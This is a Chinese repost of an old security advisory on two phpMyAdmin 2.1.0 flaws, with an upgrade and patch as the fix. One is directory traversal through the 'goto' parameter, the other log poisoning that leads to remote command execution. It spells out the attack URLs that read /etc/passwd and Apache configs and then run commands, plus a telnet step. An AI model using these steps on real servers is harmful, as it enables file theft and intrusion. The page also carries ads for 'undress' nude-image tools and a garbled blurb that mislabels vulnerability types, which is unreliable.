phpMyAdmin2.1.0存在两个漏洞_PHP教程
phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) 是一款管理 MySQL 数据库的 PHP 工具,具有基于 WEB 的界面。但是发现它存在漏洞。可选择安装新发布稳定版本:
phpMyAdmin 2.2.0。
1、目录遍历漏洞
攻击者通过提供如下的 URL:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)
http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd
能非法访问系统文件
有问题的代码在:
‘include($goto);‘ in sql.php and in tbl_replace.php.
2、执行攻击者代码漏洞
通过使用全局可写日志文件,攻击者能在受影响服务器上执行任意代码。
首先,得到 Apache 配置文件以便知道日志文件存储位置:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/access.conf&btnDrop=No
可以看出,日志放在:
/var/log/httpd/error_log
/var/log/httpd/access_log
然后 telnet 到 端口80
# telnet www.example.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.example.com.
Escape character is ‘^]‘.
GET
^]
telnet> quit
Connection closed.
#
在 GET 请求之后,攻击者能将任意 PHP 代码上传
现在,可以用 Apache 用户身份远程运行命令了:
http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/
access_log&btnDrop=No?meters=ls%20-l%20/
受影响系统:
phpMyAdmin 2.1.0
解决方案:
建议:
1.使用 phpMyAdmin 2.2.0
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz
2.用户下载安装补丁:
http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff
摘自:52w.net
Heiße KI -Werkzeuge
Undresser.AI Undress
KI-gestützte App zum Erstellen realistischer Aktfotos
AI Clothes Remover
Online-KI-Tool zum Entfernen von Kleidung aus Fotos.
Undress AI Tool
Ausziehbilder kostenlos
Clothoff.io
KI-Kleiderentferner
AI Hentai Generator
Erstellen Sie kostenlos Ai Hentai.
Heißer Artikel
Heiße Werkzeuge
Notepad++7.3.1
Einfach zu bedienender und kostenloser Code-Editor
SublimeText3 chinesische Version
Chinesische Version, sehr einfach zu bedienen
Senden Sie Studio 13.0.1
Leistungsstarke integrierte PHP-Entwicklungsumgebung
Dreamweaver CS6
Visuelle Webentwicklungstools
SublimeText3 Mac-Version
Codebearbeitungssoftware auf Gottesniveau (SublimeText3)
Heiße Themen
1378
52
So legen Sie den Primärschlüssel in phpmyadmin fest
Apr 07, 2024 pm 02:54 PM
Der Primärschlüssel einer Tabelle besteht aus einer oder mehreren Spalten, die jeden Datensatz in der Tabelle eindeutig identifizieren. Hier sind die Schritte zum Festlegen eines Primärschlüssels: Melden Sie sich bei phpMyAdmin an. Wählen Sie Datenbank und Tabelle aus. Markieren Sie die Spalte, die Sie als Primärschlüssel verwenden möchten. Klicken Sie auf „Änderungen speichern“. Primärschlüssel bieten Datenintegrität, Suchgeschwindigkeit und Vorteile bei der Beziehungsmodellierung.
So fügen Sie Fremdschlüssel in phpmyadmin hinzu
Apr 07, 2024 pm 02:36 PM
Das Hinzufügen eines Fremdschlüssels in phpMyAdmin kann durch die folgenden Schritte erreicht werden: Wählen Sie die übergeordnete Tabelle aus, die den Fremdschlüssel enthält. Bearbeiten Sie die übergeordnete Tabellenstruktur und fügen Sie unter „Spalten“ neue Spalten hinzu. Aktivieren Sie Fremdschlüsseleinschränkungen und wählen Sie die referenzierende Tabelle und den Schlüssel aus. Legen Sie Aktualisierungs-/Löschvorgänge fest. Änderungen speichern.
Wo gibt es die WordPress-Datenbank?
Apr 15, 2024 pm 10:39 PM
Die WordPress-Datenbank ist in einer MySQL-Datenbank untergebracht, die alle Website-Daten speichert und auf die über das Dashboard Ihres Hosting-Anbieters, FTP oder phpMyAdmin zugegriffen werden kann. Der Datenbankname bezieht sich auf die URL oder den Benutzernamen der Website und der Zugriff erfordert die Verwendung von Datenbankanmeldeinformationen, einschließlich Name, Benutzername, Passwort und Hostname, die normalerweise in der Datei „wp-config.php“ gespeichert sind.
So löschen Sie eine Datentabelle in phpmyadmin
Apr 07, 2024 pm 03:00 PM
Schritte zum Löschen einer Datentabelle in phpMyAdmin: Wählen Sie die Datenbank und die Datentabelle aus. Klicken Sie auf die Option „Löschen“.
Zu welcher Art von Sicherheitslücke gehört die phpmyadmin-Sicherheitslücke?
Apr 07, 2024 pm 01:36 PM
phpMyAdmin ist anfällig für mehrere Schwachstellen, darunter: 1. Schwachstelle durch SQL-Injection (XSS); 3. Schwachstelle durch Remotecode-Ausführung (LFI); 5. Schwachstelle bei der Offenlegung von Informationen; Sicherheitslücke; 6. Sicherheitslücke bezüglich der Rechteausweitung.
Was soll ich tun, wenn Navicat keine Verbindung herstellen kann?
Apr 23, 2024 am 10:00 AM
Wenn Navicat keine Verbindung herstellen kann, können Sie die folgenden Lösungen der Reihe nach ausprobieren: Überprüfen Sie, ob die Verbindungsinformationen korrekt sind, z. B. Datenbankname, Hostname, Portnummer, Benutzername und Passwort. Stellen Sie sicher, dass die Datenbank betriebsbereit ist. Überprüfen Sie die Firewall-Regeln, um sicherzustellen, dass Navicat und zugehörige Dienste nicht blockiert werden. Versuchen Sie, Ihre Netzwerkverbindung mit dem Ping-Befehl zu testen. Aktualisieren Sie die Navicat-Client-Software auf die neueste Version. Überprüfen Sie die Serverprotokolle auf Fehlermeldungen im Zusammenhang mit fehlgeschlagenen Verbindungen. Versuchen Sie, eine Verbindung mit anderen Datenbanktools herzustellen, um Navicat-spezifische Probleme zu beheben.
So exportieren Sie Excel mit phpmyadmin
Apr 07, 2024 pm 02:24 PM
Daten über phpMyAdmin in das Excel-Format exportieren: Nachdem Sie sich bei phpMyAdmin angemeldet haben, wählen Sie die zu exportierende Datenbank und Tabelle aus. Klicken Sie auf die Option „Exportieren“ und wählen Sie im Dropdown-Menü „Format“ die Option „Excel“. Wählen Sie Ihre eigenen Exportspalten, Abfrageoptionen und andere Exportoptionen. Klicken Sie auf die Schaltfläche „Dump“, um den Export zu starten und die exportierte Excel-Datei herunterzuladen.
So ändern Sie das Standardkennwort von Empire CMS
Apr 16, 2024 pm 03:21 PM
Setzen Sie das Empire CMS-Standardkennwort mit den folgenden Schritten zurück: Melden Sie sich bei der Datenbank an und suchen Sie die Benutzertabelle. Bearbeiten Sie den Administratorbenutzer (Benutzername ist admin). Ändern Sie den Wert im Passwortfeld. Speichern Sie die Änderungen und melden Sie sich mit dem neuen Passwort am Management-Backend an.
